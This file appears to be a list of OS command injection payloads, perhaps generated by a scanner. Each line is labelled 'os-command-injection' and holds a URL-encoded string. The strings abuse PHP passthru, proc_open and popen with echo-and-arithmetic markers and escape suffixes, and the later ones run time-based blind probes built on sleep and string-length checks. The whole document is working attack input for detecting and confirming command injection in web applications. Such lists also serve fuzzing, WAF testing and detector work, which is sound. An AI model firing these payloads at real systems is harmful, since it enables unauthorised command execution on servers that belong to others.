+os-command-injection,'${passthru(print(`echo%20OAAISJ`.`echo%20$((72%2B52))`.`echo%20OAAISJ`.`echo%20OAAISJ`)%3B%23OAAISJ' +os-command-injection,'${passthru(print(`echo%20PYELUB;echo%20$((29%2B64));echo%20PYELUB;echo%20PYELUB`)%3B%2523PYELUB' +os-command-injection,'${passthru(print(`echo%20FHTLVG%0aecho%20$((8%2B87))%0aecho%20FHTLVG%0aecho%20FHTLVG`)%3B%252523FHTLVG' +os-command-injection,'${passthru(print(`echo%20QPYRBQ\necho%20$((35%2B79))\necho%20QPYRBQ\necho%20QPYRBQ`)%3B%25252523QPYRBQ' +os-command-injection,'${passthru(print(`echo%20UOUNQT`.`echo%20$((2%2B66))`.`echo%20UOUNQT`.`echo%20UOUNQT`)%3B.%22UOUNQT' +os-command-injection,'${passthru(print(`echo%20HRCXNG;echo%20$((6%2B10));echo%20HRCXNG;echo%20HRCXNG`)%3B.%2522HRCXNG' +os-command-injection,'${passthru(print(`echo%20KRUYIM%0aecho%20$((16%2B77))%0aecho%20KRUYIM%0aecho%20KRUYIM`)%3B.%252522KRUYIM' +os-command-injection,'${passthru(print(`echo%20CSYNWP\necho%20$((93%2B10))\necho%20CSYNWP\necho%20CSYNWP`)%3B.%25252522CSYNWP' +os-command-injection,'${passthru(print(`echo%20RBCHID`.`echo%20$((71%2B83))`.`echo%20RBCHID`.`echo%20RBCHID`)%3B.%27RBCHID' +os-command-injection,'${passthru(print(`echo%20XUWNEP;echo%20$((61%2B20));echo%20XUWNEP;echo%20XUWNEP`)%3B.%2527XUWNEP' +os-command-injection,'${passthru(print(`echo%20QKCAAG%0aecho%20$((61%2B22))%0aecho%20QKCAAG%0aecho%20QKCAAG`)%3B.%252527QKCAAG' +os-command-injection,'${passthru(print(`echo%20EGTRQH\necho%20$((17%2B5))\necho%20EGTRQH\necho%20EGTRQH`)%3B.%25252527EGTRQH' +os-command-injection,'${passthru(print(`echo%20DAORGO`.`echo%20$((65%2B75))`.`echo%20DAORGO`.`echo%20DAORGO`)%29%7DDAORGO' +os-command-injection,'${passthru(print(`echo%20CYGOXX;echo%20$((41%2B31));echo%20CYGOXX;echo%20CYGOXX`)%3B%2529%257DCYGOXX' +os-command-injection,'${passthru(print(`echo%20OSWWFT%0aecho%20$((92%2B42))%0aecho%20OSWWFT%0aecho%20OSWWFT`)%3B%252529%25257DOSWWFT' +os-command-injection,'${passthru(print(`echo%20OVSNXT\necho%20$((21%2B17))\necho%20OVSNXT\necho%20OVSNXT`)%3B%25252529%2525257DOVSNXT' +os-command-injection,'${proc_open(print(`echo%20TIYJYD`.`echo%20$((86%2B26))`.`echo%20TIYJYD`.`echo%20TIYJYD`)%3BTIYJYD' +os-command-injection,'${proc_open(print(`echo%20XAKQYF;echo%20$((41%2B51));echo%20XAKQYF;echo%20XAKQYF`)%3BXAKQYF' +os-command-injection,'${proc_open(print(`echo%20WMSMFM%0aecho%20$((4%2B30))%0aecho%20WMSMFM%0aecho%20WMSMFM`)%3BWMSMFM' +os-command-injection,'${proc_open(print(`echo%20FCANMP\necho%20$((61%2B35))\necho%20FCANMP\necho%20FCANMP`)%3BFCANMP' +os-command-injection,'${proc_open(print(`echo%20BUFRZN`.`echo%20$((99%2B37))`.`echo%20BUFRZN`.`echo%20BUFRZN`)%3B%5C%5CBUFRZN' +os-command-injection,'${proc_open(print(`echo%20SKXDUS;echo%20$((67%2B97));echo%20SKXDUS;echo%20SKXDUS`)%3B%255C%255CSKXDUS' +os-command-injection,'${proc_open(print(`echo%20SQZPMJ%0aecho%20$((94%2B63))%0aecho%20SQZPMJ%0aecho%20SQZPMJ`)%3B%25255C%25255CSQZPMJ' +os-command-injection,'${proc_open(print(`echo%20ZMUKGP\necho%20$((9%2B61))\necho%20ZMUKGP\necho%20ZMUKGP`)%3B%2525255C%2525255CZMUKGP' +os-command-injection,'${proc_open(print(`echo%20KDOEOK`.`echo%20$((74%2B18))`.`echo%20KDOEOK`.`echo%20KDOEOK`)%3B//KDOEOK' +os-command-injection,'${proc_open(print(`echo%20RTNMAU;echo%20$((3%2B92));echo%20RTNMAU;echo%20RTNMAU`)%3B//RTNMAU' +os-command-injection,'${proc_open(print(`echo%20HEDLVC%0aecho%20$((95%2B18))%0aecho%20HEDLVC%0aecho%20HEDLVC`)%3B//HEDLVC' +os-command-injection,'${proc_open(print(`echo%20KNDTDG\necho%20$((98%2B53))\necho%20KNDTDG\necho%20KNDTDG`)%3B//KNDTDG' +os-command-injection,'${proc_open(print(`echo%20BBSVGQ`.`echo%20$((42%2B81))`.`echo%20BBSVGQ`.`echo%20BBSVGQ`)%3B%23BBSVGQ' +os-command-injection,'${proc_open(print(`echo%20LUFXAF;echo%20$((85%2B77));echo%20LUFXAF;echo%20LUFXAF`)%3B%2523LUFXAF' +os-command-injection,'${proc_open(print(`echo%20BPIHJI%0aecho%20$((94%2B16))%0aecho%20BPIHJI%0aecho%20BPIHJI`)%3B%252523BPIHJI' +os-command-injection,'${proc_open(print(`echo%20SRVISB\necho%20$((34%2B18))\necho%20SRVISB\necho%20SRVISB`)%3B%25252523SRVISB' +os-command-injection,'${proc_open(print(`echo%20KZLOGK`.`echo%20$((4%2B23))`.`echo%20KZLOGK`.`echo%20KZLOGK`)%3B.%22KZLOGK' +os-command-injection,'${proc_open(print(`echo%20MLSOYZ;echo%20$((72%2B12));echo%20MLSOYZ;echo%20MLSOYZ`)%3B.%2522MLSOYZ' +os-command-injection,'${proc_open(print(`echo%20JXTIWP%0aecho%20$((97%2B60))%0aecho%20JXTIWP%0aecho%20JXTIWP`)%3B.%252522JXTIWP' +os-command-injection,'${proc_open(print(`echo%20EBZMPW\necho%20$((54%2B99))\necho%20EBZMPW\necho%20EBZMPW`)%3B.%25252522EBZMPW' +os-command-injection,'${proc_open(print(`echo%20CPKMZS`.`echo%20$((71%2B91))`.`echo%20CPKMZS`.`echo%20CPKMZS`)%3B.%27CPKMZS' +os-command-injection,'${proc_open(print(`echo%20HWBQFG;echo%20$((79%2B43));echo%20HWBQFG;echo%20HWBQFG`)%3B.%2527HWBQFG' +os-command-injection,'${proc_open(print(`echo%20TDPGNL%0aecho%20$((89%2B52))%0aecho%20TDPGNL%0aecho%20TDPGNL`)%3B.%252527TDPGNL' +os-command-injection,'${proc_open(print(`echo%20JQUEEX\necho%20$((81%2B77))\necho%20JQUEEX\necho%20JQUEEX`)%3B.%25252527JQUEEX' +os-command-injection,'${proc_open(print(`echo%20EALLNU`.`echo%20$((18%2B91))`.`echo%20EALLNU`.`echo%20EALLNU`)%29%7DEALLNU' +os-command-injection,'${proc_open(print(`echo%20RMMUOG;echo%20$((61%2B62));echo%20RMMUOG;echo%20RMMUOG`)%3B%2529%257DRMMUOG' +os-command-injection,'${proc_open(print(`echo%20TWETUM%0aecho%20$((82%2B35))%0aecho%20TWETUM%0aecho%20TWETUM`)%3B%252529%25257DTWETUM' +os-command-injection,'${proc_open(print(`echo%20GSEIBK\necho%20$((71%2B35))\necho%20GSEIBK\necho%20GSEIBK`)%3B%25252529%2525257DGSEIBK' +os-command-injection,'${popen(print(`echo%20VGNVLG`.`echo%20$((76%2B39))`.`echo%20VGNVLG`.`echo%20VGNVLG`)%3BVGNVLG' +os-command-injection,'${popen(print(`echo%20IWFPXG;echo%20$((92%2B70));echo%20IWFPXG;echo%20IWFPXG`)%3BIWFPXG' +os-command-injection,'${popen(print(`echo%20RWKSAH%0aecho%20$((18%2B34))%0aecho%20RWKSAH%0aecho%20RWKSAH`)%3BRWKSAH' +os-command-injection,'${popen(print(`echo%20TBFYMH\necho%20$((44%2B94))\necho%20TBFYMH\necho%20TBFYMH`)%3BTBFYMH' +os-command-injection,'${popen(print(`echo%20YYAFET`.`echo%20$((62%2B68))`.`echo%20YYAFET`.`echo%20YYAFET`)%3B%5C%5CYYAFET' +os-command-injection,'${popen(print(`echo%20ATLEFF;echo%20$((90%2B9));echo%20ATLEFF;echo%20ATLEFF`)%3B%255C%255CATLEFF' +os-command-injection,'${popen(print(`echo%20JDFWVW%0aecho%20$((92%2B86))%0aecho%20JDFWVW%0aecho%20JDFWVW`)%3B%25255C%25255CJDFWVW' +os-command-injection,'${popen(print(`echo%20UQCXVD\necho%20$((60%2B78))\necho%20UQCXVD\necho%20UQCXVD`)%3B%2525255C%2525255CUQCXVD' +os-command-injection,'${popen(print(`echo%20PBSYUK`.`echo%20$((49%2B23))`.`echo%20PBSYUK`.`echo%20PBSYUK`)%3B//PBSYUK' +os-command-injection,'${popen(print(`echo%20UYCUPP;echo%20$((99%2B36));echo%20UYCUPP;echo%20UYCUPP`)%3B//UYCUPP' +os-command-injection,'${popen(print(`echo%20AHQLIX%0aecho%20$((35%2B21))%0aecho%20AHQLIX%0aecho%20AHQLIX`)%3B//AHQLIX' +os-command-injection,'${popen(print(`echo%20RWZIYD\necho%20$((45%2B92))\necho%20RWZIYD\necho%20RWZIYD`)%3B//RWZIYD' +os-command-injection,'${popen(print(`echo%20XGFDZU`.`echo%20$((14%2B6))`.`echo%20XGFDZU`.`echo%20XGFDZU`)%3B%23XGFDZU' +os-command-injection,'${popen(print(`echo%20VDXXJI;echo%20$((50%2B12));echo%20VDXXJI;echo%20VDXXJI`)%3B%2523VDXXJI' +os-command-injection,'${popen(print(`echo%20UWOAFS%0aecho%20$((11%2B42))%0aecho%20UWOAFS%0aecho%20UWOAFS`)%3B%252523UWOAFS' +os-command-injection,'${popen(print(`echo%20KCHOPX\necho%20$((77%2B78))\necho%20KCHOPX\necho%20KCHOPX`)%3B%25252523KCHOPX' +os-command-injection,'${popen(print(`echo%20PBZYGX`.`echo%20$((38%2B4))`.`echo%20PBZYGX`.`echo%20PBZYGX`)%3B.%22PBZYGX' +os-command-injection,'${popen(print(`echo%20FRWTRM;echo%20$((11%2B41));echo%20FRWTRM;echo%20FRWTRM`)%3B.%2522FRWTRM' +os-command-injection,'${popen(print(`echo%20LSIFOR%0aecho%20$((86%2B39))%0aecho%20LSIFOR%0aecho%20LSIFOR`)%3B.%252522LSIFOR' +os-command-injection,'${popen(print(`echo%20FJKMCS\necho%20$((43%2B2))\necho%20FJKMCS\necho%20FJKMCS`)%3B.%25252522FJKMCS' +os-command-injection,'${popen(print(`echo%20XZRRJD`.`echo%20$((95%2B86))`.`echo%20XZRRJD`.`echo%20XZRRJD`)%3B.%27XZRRJD' +os-command-injection,'${popen(print(`echo%20MVEAQD;echo%20$((64%2B58));echo%20MVEAQD;echo%20MVEAQD`)%3B.%2527MVEAQD' +os-command-injection,'${popen(print(`echo%20BZEAYT%0aecho%20$((11%2B35))%0aecho%20BZEAYT%0aecho%20BZEAYT`)%3B.%252527BZEAYT' +os-command-injection,'${popen(print(`echo%20ZTPGAU\necho%20$((52%2B3))\necho%20ZTPGAU\necho%20ZTPGAU`)%3B.%25252527ZTPGAU' +os-command-injection,'${popen(print(`echo%20LBEVLL`.`echo%20$((2%2B31))`.`echo%20LBEVLL`.`echo%20LBEVLL`)%29%7DLBEVLL' +os-command-injection,'${popen(print(`echo%20BZLGPL;echo%20$((70%2B63));echo%20BZLGPL;echo%20BZLGPL`)%3B%2529%257DBZLGPL' +os-command-injection,'${popen(print(`echo%20SLXBWN%0aecho%20$((29%2B57))%0aecho%20SLXBWN%0aecho%20SLXBWN`)%3B%252529%25257DSLXBWN' +os-command-injection,'${popen(print(`echo%20QDXUDJ\necho%20$((17%2B75))\necho%20QDXUDJ\necho%20QDXUDJ`)%3B%25252529%2525257DQDXUDJ' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' 